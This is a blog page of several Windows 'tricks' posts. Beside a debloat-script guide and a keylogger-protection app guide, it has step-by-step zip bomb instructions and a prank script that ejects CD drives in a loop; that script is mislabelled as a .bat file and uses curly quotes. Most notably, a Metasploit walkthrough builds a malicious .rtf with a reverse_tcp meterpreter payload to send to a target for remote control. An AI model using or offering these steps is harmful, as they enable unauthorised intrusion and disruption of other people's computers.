Showing posts with label Cmd. Show all posts
Showing posts with label Cmd. Show all posts

Sunday, 11 August 2024

10 steps to use chris titus tool in windows

 Chris Titus Tech's tool, known as "Titus Tool," is a script designed to debloat, optimize, and manage Windows settings efficiently. Here’s a step-by-step guide on how to use it:


### **Step 1: Download the Script**

1. Open a web browser and visit Chris Titus Tech's GitHub repository for the tool.

2. Download the latest version of the script. The repository is usually found at [ChrisTitusTech/Win10Script](https://github.com/ChrisTitusTech/win10script).


### **Step 2: Extract the Script**

1. If the script is downloaded as a zip file, extract it to a folder on your computer.


### **Step 3: Open PowerShell**

1. Right-click on the **Start Menu** and select **Windows PowerShell (Admin)**. This opens PowerShell with administrative privileges, which is required to run the script.


### **Step 4: Set Execution Policy**

1. Run the command:

   ```powershell

   Set-ExecutionPolicy Unrestricted -Scope Process

   ```

   This allows the script to run on your system.


### **Step 5: Navigate to the Script Folder**

1. Use the `cd` command to navigate to the folder where you extracted the script. For example:

   ```powershell

   cd C:\Path\To\Script

   ```


### **Step 6: Run the Script**

1. To execute the script, type:

   ```powershell

   .\win10debloat.ps1

   ```

   The script will start running, and a menu will appear with various options.


### **Step 7: Choose Desired Options**

1. The script will present you with a menu of options such as "Debloat Windows 10," "Remove OneDrive," "Change Privacy Settings," and more.

2. Select the desired options by typing the corresponding number or letter.


### **Step 8: Follow On-Screen Prompts**

1. Some options may require further input or confirmation. Follow the on-screen prompts to complete each action.


### **Step 9: Restart Your Computer**

1. After the script completes, it’s recommended to restart your computer to apply all changes.


### **Step 10: Review Changes**

1. After the reboot, review your system to ensure that all desired changes have been applied. You may need to tweak additional settings manually if necessary.


By following these steps, you can effectively use Chris Titus Tech's tool to optimize your Windows system.

Monday, 1 January 2024

How to Make a Zip Bomb in Windows

 

  • Step-1: Open any text editor and type Space ('  ') and save the file as 'a.txt'

  • Step-2: Copy and paste spaces (' ') as many times as possible until the file is of significant size (2 to 3MB). Then save the file.

  • Step-3: Make 100+ copies of 'a.txt' in the same folder.

  • Step-4: Open command prompt in the same folder and enter the command below to combine all the text files into one and save it as 'b.txt'.copy /b *.txt b.txt

  • Step-5: Repeat steps 3 and 4 to create an even larger text file of 2 to 3 GB and save it as 'c.txt'.

  • Step-6: Compress the text file 'c.txt' using WinZipWinRAR or 7-Zip and save it as 'smallbomb.zip'.

  • Step-7: Make several copies of 'smallbomb.zip' then add them all into one final archive and save it as 'bomb.zip' and your Zip Bomb is ready.

Sunday, 16 May 2021

SCRIPT TO POP UP CD DRIVE

 Do you still remember that some Disc has this?

If you try to copy a video or music by open it directly the this will happen?
Your CD/DVD POP UP ENDLESSLY?
 
Well, here how you can create it too using notepad..
 

Set oWMP = CreateObject(”WMPlayer.OCX.7″)
 Set colCDROMs = oWMP.cdromCollection
 do
 if colCDROMs.Count >= 1 then
 For i = 0 to colCDROMs.Count – 1
 colCDROMs.Item(i).Eject
 Next
 For i = 0 to colCDROMs.Count – 1
 colCDROMs.Item(i).Eject
 Next
 End If
 wscript.sleep 100
 loop

 

Save it as CD.bat

 

 

Warning: Don't open it on your own PC

 

(Educational Purpose Only)

 

Friday, 3 July 2020

​​How To Encrypt Keyboard To Avoid Keyloggers


🔴Steps :

Step 1. First of all download and install the toolKeyScrambler.You Can Easily Get it on Google

Step 2. Now after downloading, install it and after complete installation, you have to reboot your system.

Step 3. Now when your computer boots up, right click on the icon of KeyScrambler in the system tray at the bottom of a screen.

Step 4. Now choose options from there and Keyscrambler will open

Step 5. Now you can alter settings in this according to your wish and after that simply click on ok. Now your key scrambler app is ready, open your browser and type anything you can see that your keystrokes are being encrypted.

That’s it! you are done, now you can see this tool every time you open your browser.


Friday, 10 February 2017

Remotely Hack A PC using Kali Linux & Metasploit

We will create a .rtf file and you need to send it to target. when your target will open this file in his/her Computer you will have a meterpreter session and You can do anything you want with the target system. that’s how you can hack a computer from your computer.
so that is the easiest way Most hackers can use to hack computers from another computer.
As usual we will start from Kali linux. You need to fire up Kali Linux. if You wana be an elite ethical hacker then here is a collection of some useful articles.
Let start the tutorial on how to hack a computer remotely.

Open Kali Linux and start msf console

You need to open Metasploit. You can fire up metasploit easily by going to
applications>Kali Linux>metasploit framework
How to hack a Computer Remotely ( Metasploit Tutorial )

Choose Exploit to hack a computer over internet

now its time to initialize your exploit. run this command in metasploit
use exploit/windows/fileformat/ms14_017_rtf

how to hack a computer-use exploit
if you want a detailed information about this exploit then you can find by just typing info
Now check what options we have or what we need to fill up.Just type in your console show options . and there will be a list of lots of options you can set with this exploit

Decide the FILENAME

You can decide the filename as you want. It depends on your target. here i am choosing filename as doc . so you need to type “set FILENAME doc.rtf “
how to hack a computer-set filename

Set the Payload

And finally as usual a payload can be set by using following command for the doc.rtf file . this payload will help us to start a meterpreter session to hack remote computers over internet.
set PAYLOAD windows/meterpreter/reverse_tcp
how to hack a computer-set payload

Set the LHOST

Next you need to set the LHOST . This is the ip which will be called when .rtf file will be executed. You can find your ip address by typing ipconfig in CMD and iwconfig in Kali Terminal . Type following command to set LHOST
set LHOST 192.168.1.112

How to hack a Computer Remotely ( Metasploit Tutorial )now type 
exploit

How to hack a Computer Remotely ( Metasploit Tutorial )

Open a Multi-Handler for the Connection

to accept the connection back to your system you need to set up Multi Handler. type this command
use exploit/multi/handler

How to hack a Computer Remotely ( Metasploit Tutorial )now set payload
 set PAYLOAD windows/meterpreter/reverse_tcp

How to hack a Computer Remotely ( Metasploit Tutorial )now set LHOST
 set LHOST 192.168.1.112

How to hack a Computer Remotely ( Metasploit Tutorial )AND execute finally
 exploit
that’s it . Now you need to send the .rtf file to your target, when someone will click on .rtf file, a meterpreter session will be started on your computer. Now you have almost full access to target system. You need to brush up your meterpreter commands.